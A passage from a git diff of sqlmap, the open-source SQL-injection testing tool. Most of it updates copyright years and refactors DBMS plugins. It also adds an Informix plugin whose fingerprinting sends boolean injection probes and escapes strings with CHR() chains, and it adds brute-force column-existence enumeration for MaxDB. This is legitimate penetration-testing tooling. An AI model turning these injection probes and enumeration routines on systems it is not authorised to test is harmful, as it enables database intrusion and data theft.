developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/db2/takeover.py b/plugins/dbms/db2/takeover.py index a505781cc..d1964a673 100644 --- a/plugins/dbms/db2/takeover.py +++ b/plugins/dbms/db2/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/firebird/__init__.py b/plugins/dbms/firebird/__init__.py index 2c63d088d..26d77ad67 100644 --- a/plugins/dbms/firebird/__init__.py +++ b/plugins/dbms/firebird/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/firebird/connector.py b/plugins/dbms/firebird/connector.py index 0f9beb088..275fd6401 100644 --- a/plugins/dbms/firebird/connector.py +++ b/plugins/dbms/firebird/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/firebird/enumeration.py b/plugins/dbms/firebird/enumeration.py index 1945860a0..51cdc3352 100644 --- a/plugins/dbms/firebird/enumeration.py +++ b/plugins/dbms/firebird/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/firebird/filesystem.py b/plugins/dbms/firebird/filesystem.py index ed033c2b5..fe7a6358f 100644 --- a/plugins/dbms/firebird/filesystem.py +++ b/plugins/dbms/firebird/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/firebird/fingerprint.py b/plugins/dbms/firebird/fingerprint.py index 8a8de5c70..7b7b6c557 100644 --- a/plugins/dbms/firebird/fingerprint.py +++ b/plugins/dbms/firebird/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -18,7 +18,6 @@ from lib.core.enums import DBMS from lib.core.session import setDbms from lib.core.settings import FIREBIRD_ALIASES from lib.core.settings import METADB_SUFFIX -from lib.core.settings import UNKNOWN_DBMS_VERSION from lib.request import inject from plugins.generic.fingerprint import Fingerprint as GenericFingerprint @@ -103,15 +102,7 @@ class Fingerprint(GenericFingerprint): return retVal def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(FIREBIRD_ALIASES) \ - or (conf.dbms or "").lower() in FIREBIRD_ALIASES) and Backend.getVersion() and \ - Backend.getVersion() != UNKNOWN_DBMS_VERSION: - v = Backend.getVersion().replace(">", "") - v = v.replace("=", "") - v = v.replace(" ", "") - - Backend.setVersion(v) - + if not conf.extensiveFp and Backend.isDbmsWithin(FIREBIRD_ALIASES): setDbms("%s %s" % (DBMS.FIREBIRD, Backend.getVersion())) self.getBanner() diff --git a/plugins/dbms/firebird/syntax.py b/plugins/dbms/firebird/syntax.py index c59666ade..0b52b3804 100644 --- a/plugins/dbms/firebird/syntax.py +++ b/plugins/dbms/firebird/syntax.py @@ -1,11 +1,10 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ -from lib.core.common import Backend from lib.core.common import isDBMSVersionAtLeast from plugins.generic.syntax import Syntax as GenericSyntax @@ -16,6 +15,7 @@ class Syntax(GenericSyntax): @staticmethod def escape(expression, quote=True): """ + >>> from lib.core.common import Backend >>> Backend.setVersion('2.0') ['2.0'] >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") diff --git a/plugins/dbms/firebird/takeover.py b/plugins/dbms/firebird/takeover.py index 78589f5a4..f450d2a07 100644 --- a/plugins/dbms/firebird/takeover.py +++ b/plugins/dbms/firebird/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/hsqldb/__init__.py b/plugins/dbms/hsqldb/__init__.py index 128704f61..cf7ae38d8 100644 --- a/plugins/dbms/hsqldb/__init__.py +++ b/plugins/dbms/hsqldb/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/hsqldb/connector.py b/plugins/dbms/hsqldb/connector.py index 0496badb4..a1444f956 100644 --- a/plugins/dbms/hsqldb/connector.py +++ b/plugins/dbms/hsqldb/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/hsqldb/enumeration.py b/plugins/dbms/hsqldb/enumeration.py index 9bf2b9b23..0dda3e52f 100644 --- a/plugins/dbms/hsqldb/enumeration.py +++ b/plugins/dbms/hsqldb/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -10,8 +10,9 @@ from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries -from lib.core.common import Backend from lib.core.common import unArrayizeValue +from lib.core.enums import DBMS +from lib.core.settings import HSQLDB_DEFAULT_SCHEMA from lib.request import inject class Enumeration(GenericEnumeration): @@ -26,7 +27,7 @@ class Enumeration(GenericEnumeration): infoMsg = "fetching banner" logger.info(infoMsg) - query = queries[Backend.getIdentifiedDbms()].banner.query + query = queries[DBMS.HSQLDB].banner.query kb.data.banner = unArrayizeValue(inject.getValue(query, safeCharEncode=True)) return kb.data.banner @@ -40,3 +41,6 @@ class Enumeration(GenericEnumeration): def getHostname(self): warnMsg = "on HSQLDB it is not possible to enumerate the hostname" logger.warn(warnMsg) + + def getCurrentDb(self): + return HSQLDB_DEFAULT_SCHEMA diff --git a/plugins/dbms/hsqldb/filesystem.py b/plugins/dbms/hsqldb/filesystem.py index 3e9dd9026..1f5ba523b 100644 --- a/plugins/dbms/hsqldb/filesystem.py +++ b/plugins/dbms/hsqldb/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/hsqldb/fingerprint.py b/plugins/dbms/hsqldb/fingerprint.py index 9f527a601..693b80dfb 100644 --- a/plugins/dbms/hsqldb/fingerprint.py +++ b/plugins/dbms/hsqldb/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -16,7 +16,6 @@ from lib.core.data import logger from lib.core.enums import DBMS from lib.core.session import setDbms from lib.core.settings import HSQLDB_ALIASES -from lib.core.settings import UNKNOWN_DBMS_VERSION from lib.request import inject from plugins.generic.fingerprint import Fingerprint as GenericFingerprint @@ -28,13 +27,13 @@ class Fingerprint(GenericFingerprint): value = "" wsOsFp = Format.getOs("web server", kb.headersFp) - if wsOsFp and not hasattr(conf, "api"): + if wsOsFp and not conf.api: value += "%s\n" % wsOsFp if kb.data.banner: dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) - if dbmsOsFp and not hasattr(conf, "api"): + if dbmsOsFp and not conf.api: value += "%s\n" % dbmsOsFp value += "back-end DBMS: " @@ -80,15 +79,7 @@ class Fingerprint(GenericFingerprint): """ - if not conf.extensiveFp and (Backend.isDbmsWithin(HSQLDB_ALIASES) \ - or (conf.dbms or "").lower() in HSQLDB_ALIASES) and Backend.getVersion() and \ - Backend.getVersion() != UNKNOWN_DBMS_VERSION: - v = Backend.getVersion().replace(">", "") - v = v.replace("=", "") - v = v.replace(" ", "") - - Backend.setVersion(v) - + if not conf.extensiveFp and Backend.isDbmsWithin(HSQLDB_ALIASES): setDbms("%s %s" % (DBMS.HSQLDB, Backend.getVersion())) if Backend.isVersionGreaterOrEqualThan("1.7.2"): diff --git a/plugins/dbms/hsqldb/syntax.py b/plugins/dbms/hsqldb/syntax.py index c2927406b..b998fdd5c 100644 --- a/plugins/dbms/hsqldb/syntax.py +++ b/plugins/dbms/hsqldb/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/hsqldb/takeover.py b/plugins/dbms/hsqldb/takeover.py index 6d007a6b2..453cfcf89 100644 --- a/plugins/dbms/hsqldb/takeover.py +++ b/plugins/dbms/hsqldb/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/informix/__init__.py b/plugins/dbms/informix/__init__.py new file mode 100644 index 000000000..5d7972e46 --- /dev/null +++ b/plugins/dbms/informix/__init__.py @@ -0,0 +1,34 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import INFORMIX_SYSTEM_DBS +from lib.core.unescaper import unescaper + +from plugins.dbms.informix.enumeration import Enumeration +from plugins.dbms.informix.filesystem import Filesystem +from plugins.dbms.informix.fingerprint import Fingerprint +from plugins.dbms.informix.syntax import Syntax +from plugins.dbms.informix.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class InformixMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines Informix methods + """ + + def __init__(self): + self.excludeDbsList = INFORMIX_SYSTEM_DBS + + Syntax.__init__(self) + Fingerprint.__init__(self) + Enumeration.__init__(self) + Filesystem.__init__(self) + Miscellaneous.__init__(self) + Takeover.__init__(self) + + unescaper[DBMS.INFORMIX] = Syntax.escape diff --git a/plugins/dbms/informix/connector.py b/plugins/dbms/informix/connector.py new file mode 100644 index 000000000..48b52096c --- /dev/null +++ b/plugins/dbms/informix/connector.py @@ -0,0 +1,63 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +try: + import ibm_db_dbi +except ImportError: + pass + +import logging + +from lib.core.data import conf +from lib.core.data import logger +from lib.core.exception import SqlmapConnectionException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + """ + Homepage: http://code.google.com/p/ibm-db/ + User guide: http://code.google.com/p/ibm-db/wiki/README + API: http://www.python.org/dev/peps/pep-0249/ + License: Apache License 2.0 + """ + + def __init__(self): + GenericConnector.__init__(self) + + def connect(self): + self.initConnection() + + try: + database = "DATABASE=%s;HOSTNAME=%s;PORT=%s;PROTOCOL=TCPIP;" % (self.db, self.hostname, self.port) + self.connector = ibm_db_dbi.connect(database, self.user, self.password) + except ibm_db_dbi.OperationalError, msg: + raise SqlmapConnectionException(msg) + + + self.initCursor() + self.printConnected() + + def fetchall(self): + try: + return self.cursor.fetchall() + except ibm_db_dbi.ProgrammingError, msg: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + return None + + def execute(self, query): + try: + self.cursor.execute(query) + except (ibm_db_dbi.OperationalError, ibm_db_dbi.ProgrammingError), msg: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + except ibm_db_dbi.InternalError, msg: + raise SqlmapConnectionException(msg[1]) + + self.connector.commit() + + def select(self, query): + self.execute(query) + return self.fetchall() diff --git a/plugins/dbms/informix/enumeration.py b/plugins/dbms/informix/enumeration.py new file mode 100644 index 000000000..4426f105e --- /dev/null +++ b/plugins/dbms/informix/enumeration.py @@ -0,0 +1,35 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +from lib.core.data import logger +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def __init__(self): + GenericEnumeration.__init__(self) + + def searchDb(self): + warnMsg = "on Informix searching of databases is not implemented" + logger.warn(warnMsg) + + return [] + + def searchTable(self): + warnMsg = "on Informix searching of tables is not implemented" + logger.warn(warnMsg) + + return [] + + def searchColumn(self): + warnMsg = "on Informix searching of columns is not implemented" + logger.warn(warnMsg) + + return [] + + def search(self): + warnMsg = "on Informix search option is not available" + logger.warn(warnMsg) diff --git a/plugins/dbms/informix/filesystem.py b/plugins/dbms/informix/filesystem.py new file mode 100644 index 000000000..b02afc7d3 --- /dev/null +++ b/plugins/dbms/informix/filesystem.py @@ -0,0 +1,12 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + def __init__(self): + GenericFilesystem.__init__(self) diff --git a/plugins/dbms/informix/fingerprint.py b/plugins/dbms/informix/fingerprint.py new file mode 100644 index 000000000..062af85ba --- /dev/null +++ b/plugins/dbms/informix/fingerprint.py @@ -0,0 +1,105 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import INFORMIX_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.INFORMIX) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.INFORMIX + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(INFORMIX_ALIASES): + setDbms(DBMS.INFORMIX) + + self.getBanner() + + return True + + infoMsg = "testing %s" % DBMS.INFORMIX + logger.info(infoMsg) + + result = inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM SYSMASTER:SYSDUAL)") + + if result: + infoMsg = "confirming %s" % DBMS.INFORMIX + logger.info(infoMsg) + + result = inject.checkBooleanExpression("(SELECT DBINFO('DBNAME') FROM SYSMASTER:SYSDUAL) IS NOT NULL") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.INFORMIX + logger.warn(warnMsg) + + return False + + setDbms(DBMS.INFORMIX) + + self.getBanner() + + if not conf.extensiveFp: + return True + + infoMsg = "actively fingerprinting %s" % DBMS.INFORMIX + logger.info(infoMsg) + + for version in ("12.1", "11.7", "11.5"): + output = inject.checkBooleanExpression("EXISTS(SELECT 1 FROM SYSMASTER:SYSDUAL WHERE DBINFO('VERSION,'FULL') LIKE '%%%s%%')" % version) + + if output: + Backend.setVersion(version) + break + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.INFORMIX + logger.warn(warnMsg) + + return False diff --git a/plugins/dbms/informix/syntax.py b/plugins/dbms/informix/syntax.py new file mode 100644 index 000000000..5b5705b90 --- /dev/null +++ b/plugins/dbms/informix/syntax.py @@ -0,0 +1,37 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +import re + +from lib.core.common import randomStr +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + def __init__(self): + GenericSyntax.__init__(self) + + @staticmethod + def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") + 'SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar' + """ + + def escaper(value): + return "||".join("CHR(%d)" % ord(_) for _ in value) + + excluded = {} + for _ in re.findall(r"DBINFO\([^)]+\)", expression): + excluded[_] = randomStr() + expression = expression.replace(_, excluded[_]) + + retVal = Syntax._escape(expression, quote, escaper) + + for _ in excluded.items(): + retVal = retVal.replace(_[1], _[0]) + + return retVal \ No newline at end of file diff --git a/plugins/dbms/informix/takeover.py b/plugins/dbms/informix/takeover.py new file mode 100644 index 000000000..d1964a673 --- /dev/null +++ b/plugins/dbms/informix/takeover.py @@ -0,0 +1,15 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def __init__(self): + self.__basedir = None + self.__datadir = None + + GenericTakeover.__init__(self) diff --git a/plugins/dbms/maxdb/__init__.py b/plugins/dbms/maxdb/__init__.py index 9370a87c6..8427a1458 100644 --- a/plugins/dbms/maxdb/__init__.py +++ b/plugins/dbms/maxdb/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/maxdb/connector.py b/plugins/dbms/maxdb/connector.py index 1f9feca61..125abae64 100644 --- a/plugins/dbms/maxdb/connector.py +++ b/plugins/dbms/maxdb/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/maxdb/enumeration.py b/plugins/dbms/maxdb/enumeration.py index 95ec6a385..81b450154 100644 --- a/plugins/dbms/maxdb/enumeration.py +++ b/plugins/dbms/maxdb/enumeration.py @@ -1,21 +1,25 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ -from lib.core.common import Backend from lib.core.common import randomStr +from lib.core.common import readInput from lib.core.common import safeSQLIdentificatorNaming from lib.core.common import unsafeSQLIdentificatorNaming from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.data import paths from lib.core.data import queries +from lib.core.enums import DBMS from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapNoneDataException +from lib.core.exception import SqlmapUserQuitException from lib.core.settings import CURRENT_DB +from lib.utils.brute import columnExists from lib.utils.pivotdumptable import pivotDumpTable from plugins.generic.enumeration import Enumeration as GenericEnumeration @@ -38,7 +42,7 @@ class Enumeration(GenericEnumeration): infoMsg = "fetching database names" logger.info(infoMsg) - rootQuery = queries[Backend.getIdentifiedDbms()].dbs + rootQuery = queries[DBMS.MAXDB].dbs randStr = randomStr() query = rootQuery.inband.query retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.schemaname' % randStr], blind=True) @@ -61,7 +65,7 @@ class Enumeration(GenericEnumeration): conf.db = self.getCurrentDb() if conf.db: - dbs = conf.db.split(",") + dbs = conf.db.split(',') else: dbs = self.getDbs() @@ -72,7 +76,7 @@ class Enumeration(GenericEnumeration): infoMsg += "%s: %s" % ("s" if len(dbs) > 1 else "", ", ".join(db if isinstance(db, basestring) else db[0] for db in sorted(dbs))) logger.info(infoMsg) - rootQuery = queries[Backend.getIdentifiedDbms()].tables + rootQuery = queries[DBMS.MAXDB].tables for db in dbs: randStr = randomStr() @@ -91,7 +95,7 @@ class Enumeration(GenericEnumeration): return kb.data.cachedTables - def getColumns(self, onlyColNames=False): + def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMode=False): self.forceDbmsEnum() if conf.db is None or conf.db == CURRENT_DB: @@ -111,8 +115,19 @@ class Enumeration(GenericEnumeration): conf.db = safeSQLIdentificatorNaming(conf.db) + if conf.col: + colList = conf.col.split(',') + else: + colList = [] + + if conf.excludeCol: + colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] + + for col in colList: + colList[colList.index(col)] = safeSQLIdentificatorNaming(col) + if conf.tbl: - tblList = conf.tbl.split(",") + tblList = conf.tbl.split(',') else: self.getTables() @@ -129,7 +144,44 @@ class Enumeration(GenericEnumeration): for tbl in tblList: tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) - rootQuery = queries[Backend.getIdentifiedDbms()].columns + if bruteForce: + resumeAvailable = False + + for tbl in tblList: + for db, table, colName, colType in kb.brute.columns: + if db == conf.db and table == tbl: + resumeAvailable = True + break + + if resumeAvailable and not conf.freshQueries or colList: + columns = {} + + for column in colList: + columns[column] = None + + for tbl in tblList: + for db, table, colName, colType in kb.brute.columns: + if db == conf.db and table == tbl: + columns[colName] = colType + + if conf.db in kb.data.cachedColumns: + kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)] = columns + else: + kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = {safeSQLIdentificatorNaming(tbl, True): columns} + + return kb.data.cachedColumns + + message = "do you want to use common column existence check? [y/N/q] " + choice = readInput(message, default='Y' if 'Y' in message else 'N').upper() + + if choice == 'N': + return + elif choice == 'Q': + raise SqlmapUserQuitException + else: + return columnExists(paths.COMMON_COLUMNS) + + rootQuery = queries[DBMS.MAXDB].columns for tbl in tblList: if conf.db is not None and len(kb.data.cachedColumns) > 0 \ @@ -141,6 +193,12 @@ class Enumeration(GenericEnumeration): return {conf.db: kb.data.cachedColumns[conf.db]} + if dumpMode and colList: + table = {} + table[safeSQLIdentificatorNaming(tbl)] = dict((_, None) for _ in colList) + kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table + continue + infoMsg = "fetching columns " infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) infoMsg += "on database '%s'" % unsafeSQLIdentificatorNaming(conf.db) diff --git a/plugins/dbms/maxdb/filesystem.py b/plugins/dbms/maxdb/filesystem.py index 00d14a7f0..fa74456da 100644 --- a/plugins/dbms/maxdb/filesystem.py +++ b/plugins/dbms/maxdb/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/maxdb/fingerprint.py b/plugins/dbms/maxdb/fingerprint.py index 57f24fb88..6976be515 100644 --- a/plugins/dbms/maxdb/fingerprint.py +++ b/plugins/dbms/maxdb/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -91,7 +91,7 @@ class Fingerprint(GenericFingerprint): return value def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(MAXDB_ALIASES) or (conf.dbms or "").lower() in MAXDB_ALIASES): + if not conf.extensiveFp and Backend.isDbmsWithin(MAXDB_ALIASES): setDbms(DBMS.MAXDB) self.getBanner() diff --git a/plugins/dbms/maxdb/syntax.py b/plugins/dbms/maxdb/syntax.py index b8612b3a1..11eddc97a 100644 --- a/plugins/dbms/maxdb/syntax.py +++ b/plugins/dbms/maxdb/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/maxdb/takeover.py b/plugins/dbms/maxdb/takeover.py index 32d3a0969..cd38c715a 100644 --- a/plugins/dbms/maxdb/takeover.py +++ b/plugins/dbms/maxdb/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/mssqlserver/__init__.py b/plugins/dbms/mssqlserver/__init__.py index c701c0f9f..607d989dd 100644 --- a/plugins/dbms/mssqlserver/__init__.py +++ b/plugins/dbms/mssqlserver/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/mssqlserver/connector.py b/plugins/dbms/mssqlserver/connector.py index 657d796fd..6439a468e 100644 --- a/plugins/dbms/mssqlserver/connector.py +++ b/plugins/dbms/mssqlserver/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -41,7 +41,7 @@ class Connector(GenericConnector): try: self.connector = pymssql.connect(host="%s:%d" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout) - except (pymssql.InterfaceError, pymssql.OperationalError), msg: + except (pymssql.Error, _mssql.MssqlDatabaseException), msg: raise SqlmapConnectionException(msg) self.initCursor() @@ -50,7 +50,7 @@ class Connector(GenericConnector): def fetchall(self): try: return self.cursor.fetchall() - except (pymssql.ProgrammingError, pymssql.OperationalError, _mssql.MssqlDatabaseException), msg: + except (pymssql.Error, _mssql.MssqlDatabaseException), msg: logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % str(msg).replace("\n", " ")) return None diff --git a/plugins/dbms/mssqlserver/enumeration.py b/plugins/dbms/mssqlserver/enumeration.py index 9ea67eff9..64d54f70e 100644 --- a/plugins/dbms/mssqlserver/enumeration.py +++ b/plugins/dbms/mssqlserver/enumeration.py @@ -1,13 +1,12 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ from lib.core.agent import agent from lib.core.common import arrayizeValue -from lib.core.common import Backend from lib.core.common import getLimitRange from lib.core.common import isInferenceAvailable from lib.core.common import isNoneValue @@ -22,6 +21,7 @@ from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries from lib.core.enums import CHARSET_TYPE +from lib.core.enums import DBMS from lib.core.enums import EXPECTED from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapNoneDataException @@ -75,7 +75,7 @@ class Enumeration(GenericEnumeration): conf.db = self.getCurrentDb() if conf.db: - dbs = conf.db.split(",") + dbs = conf.db.split(',') else: dbs = self.getDbs() @@ -88,7 +88,7 @@ class Enumeration(GenericEnumeration): infoMsg += "%s: %s" % ("s" if len(dbs) > 1 else "", ", ".join(db if isinstance(db, basestring) else db[0] for db in sorted(dbs))) logger.info(infoMsg) - rootQuery = queries[Backend.getIdentifiedDbms()].tables + rootQuery = queries[DBMS.MSSQL].tables if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: for db in dbs: @@ -152,7 +152,7 @@ class Enumeration(GenericEnumeration): warnMsg += "for database '%s'" % db logger.warn(warnMsg) - if not kb.data.cachedTables: + if not kb.data.cachedTables and not conf.search: errMsg = "unable to retrieve the tables for any database" raise SqlmapNoneDataException(errMsg) else: @@ -163,13 +163,16 @@ class 